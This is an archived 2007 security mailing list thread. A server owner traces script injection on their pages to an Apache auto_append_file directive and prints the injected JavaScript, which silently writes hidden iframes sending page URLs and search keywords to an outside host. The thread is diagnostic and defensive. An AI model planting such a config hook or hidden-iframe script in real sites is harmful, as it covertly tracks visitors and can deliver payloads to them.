Security Basics mailing list archives
Re: been hacked ?
From: "d3l user" <d3luser () gmail com>
Date: Thu, 31 May 2007 19:38:07 +0200
Hi, I have find out the problem, in /etc/apache2/apache2.conf it was this line php_value auto_append_file "/usr/local/lib/php/stat.php" # # Filters allow you to process content before it is sent to the client. # # To parse .shtml files for server-side includes (SSI): # (You will also need to add "Includes" to the "Options" directive.) # AddType text/html .shtml AddOutputFilter INCLUDES .shtml AddType application/x-httpd-php .html AddType application/x-httpd-php .htm php_value auto_append_file "/usr/local/lib/php/stat.php" then opening /usr/local/lib/php/stat.php i have seen the bad string, <script src="http://wymiana.org/stat/script_vip.php?user=2254"></script> look like an SSI attack, but still not idea how . On 5/30/07, d3l user <d3luser () gmail com> wrote:
while browsing through a web page hosted on my web server I have seen in the firefox page source the following line: <script src="http://wymiana.org/stat/script_vip.php?user=2254 "></script> subsequently I have opened with vim the file index.php located on the server, and there's no trace about that line . This happens also wit static html pages. any idea about ? following you can find the tcpdum stream thanks in advance, delUser GET /mystat/2.js?host=wymiana.org HTTP/1.1 Host: rejestr.org User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty) Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mywebsite.com/ HTTP/1.1 200 OK Date: Tue, 29 May 2007 19:46:27 GMT Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 mod_ssl/2.8.27 OpenSSL/0.9.7a X-Powered-By: PHP/4.4.2 Connection: close Transfer-Encoding: chunked Content-Type: text/html 53d function stopErrors(){return true;}window.onerror=stopErrors; function getJS(v,r) { q = r.toString (); var p = q.indexOf('?'); if (p > 0) {q = q.substring(p+1);} var vs = q.split("&"); for (var i=0;i<vs.length;i++) { var pr = vs[i].split("="); if (pr[0] == v) {return pr[1];} } } var q=""; var r=""; try { if (top.document.referrer) {r=top.document.referrer;} else if (document.referrer) {r=document.referrer;}; }catch (e) {}; if (r !=="") { if (r.indexOf("google.") !== -1) {q="q";}; if (r.indexOf("msn.com") !== -1) {q="q";}; if (r.indexOf("altavista.") !== -1) {q="q";}; if (r.indexOf("yahoo.") !== -1) {q="p";}; if (r.indexOf("netsprint.") !== -1) {q="q";}; if (r.indexOf("onet.pl") !== -1) {q="qt";}; if (r.indexOf(" wp.pl") !== -1) {q="szukaj";}; if (r.indexOf("interia.pl") !== -1) {q="q";}; if (r.indexOf("szukacz.pl") !== -1) {q="q";}; if (r.indexOf("o2.pl") !== -1) {q="qt";}; } var vars=""; if ((r !=="") && (q!=="")) { vars=getJS(q,r); } if (vars=="undefined") {vars="";}; if (vars!=="") {vars=vars +"&src=se";}; if (vars!==""){ document.write("<iframe frameborder=0 style='width:0px; height:0px' src=\"http://rejestr.org/mystat/2.php?id="+self.location+"&topkey="+vars+"\"></iframe>") }else document.write("<iframe frameborder=0 style='width:0px; height:0px' src=http://rejestr.org/mystat/2.php?id="+self.location+"></iframe>") 0
Current thread:
- been hacked ? d3l user (May 30)
- Re: been hacked ? d3l user (May 31)